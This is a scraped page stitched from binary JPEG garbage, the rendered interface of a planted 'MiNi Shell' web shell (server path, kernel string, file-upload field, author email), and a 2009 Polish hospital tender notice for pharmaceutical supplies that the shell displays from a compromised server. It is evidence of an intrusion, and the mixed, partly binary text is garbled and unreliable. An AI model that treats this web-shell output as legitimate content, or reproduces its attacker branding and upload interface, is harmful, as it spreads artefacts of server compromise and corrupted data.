JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090320/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090320/71722-N-2009.html

<p class="kh_header"><b>Olsztyn: Dostawy produktów farmaceutychnych (leków)</b><br>
<b>Numer ogłoszenia: 71722 - 2009; data zamieszczenia: 20.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Gruźlicy i Chorób Płuc , ul. Jagiellońska 78, 10-357 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5322966, faks 089 5322979.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pulmonologia.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy produktów farmaceutychnych (leków).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego postępowania przetargowego są sukcesywne dostawy produktów farmaceutycznych (leków) w asortymencie, dawkach i ilości określonej w Załączniku Nr 2 do niniejszej SIWZ, w  terminie   7 miesięcy, tj. do dnia 31.12.2009 roku. Oferowane leki winny posiadać:         
                                                                                                                      
a) pozwolenie na  dopuszczenie do obrotu wydane przez ministra właściwego do spraw zdrowia, określone  ustawą  z   dnia  6  września  2001  roku  Prawo  farmaceutyczne  (Dz. U. z 2008 roku Nr 45, poz. 271) oraz ustawą z dnia 27 lipca 2001 roku o Urzędzie Rejestracji  Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych (Dz.U. Nr  126,  poz. 1379              z późniejszymi zmianami),
b)  wysoką jakość i spełniać funkcję do jakiej został przeznaczony,
c) okres przydatności do użycia nie krótszy niż 24 miesiące licząc od  daty dostawy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.  Zgodnie z art. 45 ust. 1 ustawy Zamawiający wymaga  wniesienia wadium w wysokości:
Zadanie Nr 1 - 15 600,00zł                                                                                                                                                   Zadanie Nr 2 :                                                                                                                   
poz. 1 -         8,50zł                                                                                                                                             poz. 2 -       20,87zł                                                                                                                                           poz. 3 -         6,00zł                                                                                                                                                poz. 4 -       36,00zł                                                                                                                                                    poz. 5 -       53,00zł                                                                                                                                       poz. 6 -       11,00zł                                                                                                                                       poz. 7 -       16,00zł                                                                                                                                          poz. 8 -        6 ,90zł                                                                                                                                                       poz. 9 -       14,00zł                                                                                                                                       poz. 10 -       0,50zł                                                                                                                                                                poz. 11 -       0,20zł                                                                                                                                                              poz. 12 - 3345,00zł                                                                                                                                                              poz. 13 -     39,00zł                                                                                                                                        poz. 14 -     14,00zł                                                                                                                                                      poz. 15 -     98,00zł                                                                                                                                                        poz. 16 -   510,00zł                                                                                                                                                         poz. 17 - 2400,00zł                                                                                                                                                poz. 18 -       6,00zł                                                                                                                                                      poz. 19 -       4,00zł
2.  Wadium może być wniesione w następujących formach:
a)  pieniądzu - przelewem na rachunek bankowy: Bank Millennium S.A   77   1160   2202  0000  0000  6193  7410 
b)  poręczeniach bankowych  lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej,            z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
     c)  gwarancjach bankowych,
     d)  gwarancjach ubezpieczeniowych,                                                                                                     e)  poręczeniach udzielanych przez podmioty, o których  mowa w art. 6b ust. 5 pkt 2   ustawy              z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U.           z 2007 roku, Nr 42, poz. 275). 
3.  Wadium wniesione w formie innej niż pieniężna winno być przesłane do dnia 30.04.2009 roku do  godz.  9:00,  w  osobnej  kopercie  z nazwą Wykonawcy, z dopiskiem WADIUM - DOSTAWY PRODUKTÓW FARMACEUTYCZNYCH (dołączyć  do oferty dowód przelewu, bądź kopię w przypadku innej niż pieniężna formy wadium).
4.    Zamawiający zwraca niezwłocznie  wadium w przypadkach określonych w art. 46 ustawy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy złożą ważną i odpowiednio przygotowaną ofertę  oraz :

a)	są uprawnieni do występowania w obrocie prawnym,
b)	posiadają uprawnienia do wykonania niniejszego zamówienia,
c)	   posiadają niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponują osobami zdolnymi do wykonania niniejszego zamówienia,
d)	    znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia,
e)	    nie podlegają wykluczeniu z postępowania o zamówienie na podstawie art. 24 ust.1 i 2 ustawy.
2.	W celu potwierdzenia spełnienia warunków udziału w postępowaniu Wykonawcy zobowiązani są dołączyć do przedkładanej oferty oświadczenia i dokumenty określone w Rozdziale V niniejszej SIWZ Zamawiający dokona oceny spełniania warunków udziału w postępowaniu na podstawie dokumentów i oświadczeń jakich żąda od Wykonawców w pkt V SIWZ, stosując formułę spełnia - nie spełnia  wypełniając druk ZP - 14..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Wypełniony  Formularz ofertowy - Załącznik Nr 1. 
2.	Wypełniony  Formularz cenowy - Załącznik Nr 2.
3.	Oświadczenie o spełnianiu warunków wymaganych przez Zamawiającego - Załącznik Nr 3.
4.	Aktualne pełnomocnictwo udzielone osobie podpisującej dokumenty ofertowe, o ile jej  prawo do reprezentowania Wykonawcy  w powyższym zakresie nie wynika wprost z dokumentu rejestrowego.
5.	Wskazanie osoby upoważnionej do podpisania umowy (w przypadku wyłonienia Wykonawcy             w niniejszym postępowaniu) oraz jej aktualne pełnomocnictwo, o ile jej prawo do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost z dokumentu rejestrowego.
6. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do  ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do  rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie  wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
7.  Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, potwierdzające, że  Wykonawca nie zalega             z opłacaniem podatków, opłat.
8. Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego wystawione nie wcześniej niż 3 miesiące przed upływem terminu składnia ofert, potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne lub społeczne.
9. Koncesję, zezwolenie lub licencję, jeżeli ustawy nakładają obowiązek posiadania  koncesji, zezwolenia lub licencji na podjęcie działalności gospodarczej w zakresie objętym zamówieniem (Koncesja na prowadzenie hurtowni farmaceutycznej wydana przez ministra właściwego do spraw zdrowia  bądź Zezwolenie Głównego Inspektora Farmaceutycznego na prowadzenie hurtowni farmaceutycznej lub  na prowadzenie składu celnego i konsygnacyjnego).
10. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt.  6, 7, 8, 9  niniejszego Rozdziału, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania,           o których mowa w § 2  rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 roku                     w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form,               w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz. 605).
11. Oświadczenie Wykonawcy potwierdzające, że oferowane przez niego leki posiadają aktualny dokument potwierdzający dopuszczenie ich do obrotu, bądź uprawnienie do wytwarzania oferowanego przedmiotu zamówienia, tj,:  świadectwo rejestracji, wpis do Rejestru wydany przez Prezesa Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych dopuszczonych do obrotu na terytorium Rzeczpospolitej Polskiej, deklarację zgodności, bądź  pozwolenie wydane przez  Radę Unii Europejskiej lub Komisję Europejską oraz, że dostarczą  powyższe dokumenty w formie pisemnej, na każde wezwanie Zamawiającego                  w terminie 3 dni od wezwania - oświadczenie zawierające powyższe wg własnego wzoru. Wykonawcy, którzy złożą ofertę na lek w Zadaniu Nr 2 - podzielne, poz. 12 obowiązani są dołączyć w/w aktualne dokumenty do oferty w niniejszym postępowaniu przetargowym.
12.   Zaakceptowany (podpisany) projekt umowy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pulmonologia.olsztyn.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Gruźlicy i Chorób Płuc
ul. Jagiellońska 78
10-3567 Olsztyn
Budynek administracji pok. 4.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2009 godzina 09:00, miejsce: Samodzielny Publiczny Zespół Gruźlicy i Chorób Płuc
ul. Jagiellońska 78
10-3567 Olsztyn
Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com